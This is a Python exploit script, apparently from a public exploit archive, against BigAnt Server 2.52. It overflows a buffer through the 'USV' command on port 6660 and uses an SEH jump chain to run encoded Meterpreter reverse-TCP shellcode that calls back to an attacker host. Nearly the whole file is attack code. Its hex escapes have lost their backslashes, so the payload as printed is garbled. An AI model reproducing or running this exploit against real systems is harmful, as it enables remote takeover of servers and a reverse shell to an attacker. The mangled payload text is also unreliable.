
# Title : BigAnt Server v2.52 Remote Buffer Overflow Exploit 2
# Published : 2010-01-03
# Author : DouBle_Zer0


#!/usr/bin/python

#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#another version of the original exploit (by Lincoln)
#the application is a little hazy..

import sys,socket

host = sys.argv[1]
buffer= "x90" * 20

#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("x89xe1xd9xcexd9x71xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4cx49x47x70x43x30x47x70x45x30x4fx79"
"x4ax45x50x31x49x42x45x34x4ex6bx42x72x50x30x4e"
"x6bx50x52x44x4cx4cx4bx51x42x47x64x4ex6bx51x62"
"x44x68x46x6fx4dx67x50x4ax51x36x45x61x4bx4fx44"
"x71x49x50x4cx6cx45x6cx50x61x43x4cx44x42x46x4c"
"x51x30x4ax61x4ax6fx44x4dx46x61x4ax67x4bx52x4a"
"x50x42x72x50x57x4cx4bx42x72x44x50x4ex6bx42x62"
"x45x6cx47x71x48x50x4cx4bx51x50x42x58x4bx35x49"
"x50x50x74x50x4ax47x71x48x50x50x50x4cx4bx43x78"
"x46x78x4ex6bx51x48x47x50x43x31x49x43x49x73x47"
"x4cx51x59x4cx4bx45x64x4cx4bx43x31x4bx66x44x71"
"x49x6fx50x31x4fx30x4ex4cx49x51x48x4fx46x6dx43"
"x31x4ax67x44x78x49x70x51x65x4ax54x45x53x51x6d"
"x4ax58x45x6bx43x4dx51x34x43x45x48x62x43x68x4e"
"x6bx46x38x51x34x43x31x4bx63x45x36x4ex6bx44x4c"
"x50x4bx4cx4bx43x68x47x6cx46x61x4ex33x4cx4bx44"
"x44x4cx4bx47x71x4ax70x4cx49x43x74x51x34x51x34"
"x43x6bx51x4bx50x61x42x79x51x4ax46x31x4bx4fx49"
"x70x46x38x43x6fx51x4ax4ex6bx42x32x48x6bx4dx56"
"x43x6dx50x68x46x53x46x52x45x50x43x30x43x58x43"
"x47x50x73x50x32x43x6fx42x74x45x38x50x4cx43x47"
"x46x46x47x77x49x6fx4bx65x4cx78x4ex70x45x51x47"
"x70x47x70x45x79x48x44x43x64x42x70x42x48x44x69"
"x4bx30x42x4bx47x70x4bx4fx48x55x50x50x46x30x46"
"x30x46x30x43x70x50x50x47x30x46x30x43x58x4ax4a"
"x44x4fx49x4fx49x70x4bx4fx4bx65x4ax37x50x6ax44"
"x45x43x58x4fx30x4ex48x47x71x44x43x45x38x45x52"
"x43x30x44x51x43x6cx4ex69x49x76x50x6ax42x30x50"
"x56x46x37x50x68x4ax39x4dx75x44x34x50x61x4bx4f"
"x4bx65x4fx75x4bx70x42x54x44x4cx4bx4fx42x6ex47"
"x78x44x35x4ax4cx43x58x4ax50x48x35x4dx72x43x66"
"x4bx4fx4ax75x50x6ax47x70x43x5ax45x54x46x36x43"
"x67x42x48x44x42x49x49x4fx38x51x4fx4bx4fx4bx65"
"x4ex6bx47x46x50x6ax51x50x42x48x45x50x42x30x43"
"x30x45x50x50x56x42x4ax45x50x42x48x51x48x4cx64"
"x46x33x4ax45x49x6fx4ex35x4ax33x43x63x42x4ax45"
"x50x46x36x43x63x50x57x50x68x44x42x48x59x4fx38"
"x43x6fx4bx4fx4ex35x43x31x48x43x51x39x4fx36x4c"
"x45x49x66x43x45x48x6cx4bx73x44x4ax41x41")
buffer+= "x90" * 294
buffer+= "xe9x4cxfcxffxff"  #near jmp -----> shellcode
buffer+= "xebxf9x90x90"      #short jmp ----> near jmp
buffer+= "x95x32x9ax0f"      #p/p/r(partial overwrite is not possible as far as i know) 
buffer+= "x41" * 1000           #play
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "rnrn")
s.close()